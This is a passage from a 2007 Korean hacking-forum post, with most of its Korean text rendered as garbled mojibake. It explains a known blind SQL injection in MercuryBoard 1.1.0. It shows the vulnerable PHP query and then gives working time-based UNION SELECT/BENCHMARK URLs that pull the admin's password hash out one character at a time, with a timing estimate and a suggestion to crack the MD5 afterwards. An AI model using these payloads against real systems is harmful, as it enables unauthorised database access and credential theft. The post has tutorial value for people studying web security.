|
http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=847 [º¹»ç]
ÀÎÅͳݿ¡¼ 2005³â bugtraq¿¡ ¿Ã¶ó¿Â sql injection Ãë¾àÁ¡ÀÔ´Ï´Ù. (Linux+Mysql+PHP)
¿Ü±¹¿¡ »ç¿ëµÇ´Â mercuryboard ¶ó´Â °Ô½ÃÆÇ¿¡ blind sql injection¿¡ ´ëÇÑ ±ÛÀÔ´Ï´Ù.
www.mercuryboard.com¿¡ »çÀÌÆ® ¹æ¹®Çؼ ÇÁ·Î±×·¥À» ¹Þ¾Ò´Âµ¥
ÇöÀç ÃֽŹöÁ¯ 1.1.4 ¶ó¼ ±Û¿¡ »ç¿ëÇÏ°í ÀÖ´Â 1.1.0 ¹öÁ¯À» ã¾ÆºÃ½À´Ï´Ù.
°Ë»öÇؼ ã¾Æº¸´Ï http://www.mercuryboard.com/files/old/mercuryboard-1.1.0.zip
¿¡¼ ãÀ» ¼ö ÀÖ¾ú½À´Ï´Ù.
mercuyboard ¼³Ä¡ÇÏ°í Ãë¾àÁ¡À» Å×½ºÆ®ÇÕ´Ï´Ù.
http://localhost/index.php?a=post&s=reply&t=1' ¸í·ÉÀ» Çغ¸´Ï ' 󸮸¦ Àß ¸øÇؼ
sql ¹®Àå ¿¡·¯°¡ ³ª¿É´Ï´Ù.
SELECT t.topic_modes, t.topic_title, f.forum_name, f.forum_id, t.topic_replies FROM mb_topics t, mb_forums f WHERE t.topic_id=1\' AND f.forum_id=t.topic_forum
post.php
$topic = $this->db->fetch("
SELECT
t.topic_modes, t.topic_title, f.forum_name, f.forum_id, t.topic_replies
FROM
{$this->pre}topics t, {$this->pre}forums f
WHERE
t.topic_id={$this->get['t']} AND f.forum_id=t.topic_forum");
¿¡·¯°¡ ³ª¿À´Â°É º¸°í ÀԷ°ªÀÇ ÇÊÅ͸µÀ» ÇÏÁö ¾Ê´Â°ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.
Å×½ºÆ® Çϱâ À§ÇØ ³»°¡ µî·ÏÇÑ admin Á¤º¸¸¦ µðºñ¿¡¼ Ãâ·ÂÇÕ´Ï´Ù.
mysql> select user_name,user_password from mb_users where user_group=1;
+-----------+----------------------------------+
| user_name | user_password |
+-----------+----------------------------------+
| admin | 81dc9bdb52d04dc20036dbd8313ed055 |
+-----------+----------------------------------+
1 row in set (0.00 sec)
À¥»ó¿¡¼ user_passwordÀÇ Ã¹¹®ÀÚÀÎ 8À» ¾Ë¾Æ³»´Â°Ô ¸ñÇ¥ÀÔ´Ï´Ù.
ÀÌ ±Û¿¡¼ »ç¿ëÇÑ ¹æ¹ýÀº time delay¸¦ ÅëÇؼ ÆÇ´ÜÇÕ´Ï´Ù.
MSSQL ¿¡¼´Â IF [QUERY] waitfor [TIME]. ¹æ½ÄÀ¸·Î »ç¿ëÇϴµ¥
MySql ¿¡¼´Â BENCHMARK() ÇÔ¼ö¸¦ ´ë¾ÈÀ¸·Î »ç¿ëÇÕ´Ï´Ù.
À¥¿¡¼
http://localhost/index.php?a=post&s=reply&t=1%20UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%20=%20CHAR(56),BENCHMARK(1000000,MD5(CHAR(1))),null),null,null,null,null%20FROM%20mb_users%20WHERE%20user_group%20=%201/*
http://localhost/index.php?a=post&s=reply&t=1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(56),BENCHMARK(1000000,MD5(CHAR(1))),null),null,null,null,null FROM mb_users WHERE user_group = 1/*
¶ó°í Ä¡¸é IF Á¶°Ç¿¡ ÀÇÇØ ÂüÀΰæ¿ì 10ÃÊ ÈÄ ÀÀ´äÀÌ ³ª¿É´Ï´Ù.
°á±¹ Àüü ¾ÏÈ£¸¦ ¾Ë¾Æ³»´Âµ¥
0 to 9 --> ASCII 48 to 57
a to z --> ASCII 97 to 122
ÃÖ´ë½Ã°£Àº
(Àüü¹®ÀÚ 35ÀÚ *3(º¸Åë ÀÀ´ä½Ã°£ ÃÊ) + ¼º°ø½Ã°£10ÃÊ )*32¾ÏÈ£±æÀÌ = 3622ÃÊ (´ë·« 1½Ã°£) À̶õ °á°ú°¡ ³ª¿É´Ï´Ù.
¾ÏÈ£¸¦ ¾Ë¾Æ³»¸é MD5¸¦ Å©·¢ÇÏ´Â Ãֽűâ¼úÀ» »ç¿ëÇÏ¿© ¾ÏÈ£¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ½À´Ï´Ù
--------------------------------------------------------------------------
À̹ø¿¡´Â Ãë¾àÁ¡µµ Å×½ºÆ®ÇÏ´Â °ÍÀ» ½è³×¿ä ¸¹Àº µµ¿òÀÌ µÇ¾úÀ¸¸é ÁÁ°Ú³×¿ä
Ãâó À̰͵µ ¿ª½Ã ¹ö±×*°ÔÀÓÇÙ*Å°·Î±×*ÇØÅ·&º¸¾ÈÅø ÀÇ ±¤´ë´ÔÀÌ ¾´±ÛÀ»
Âɱî(<-’y »çÅõ¸®³Ä?) º¯Çü ½ÃŲ°ÍÀÔ´Ï´Ù |
Hit : 10285 Date : 2007/08/28 03:27
|
1586, 
63/80 
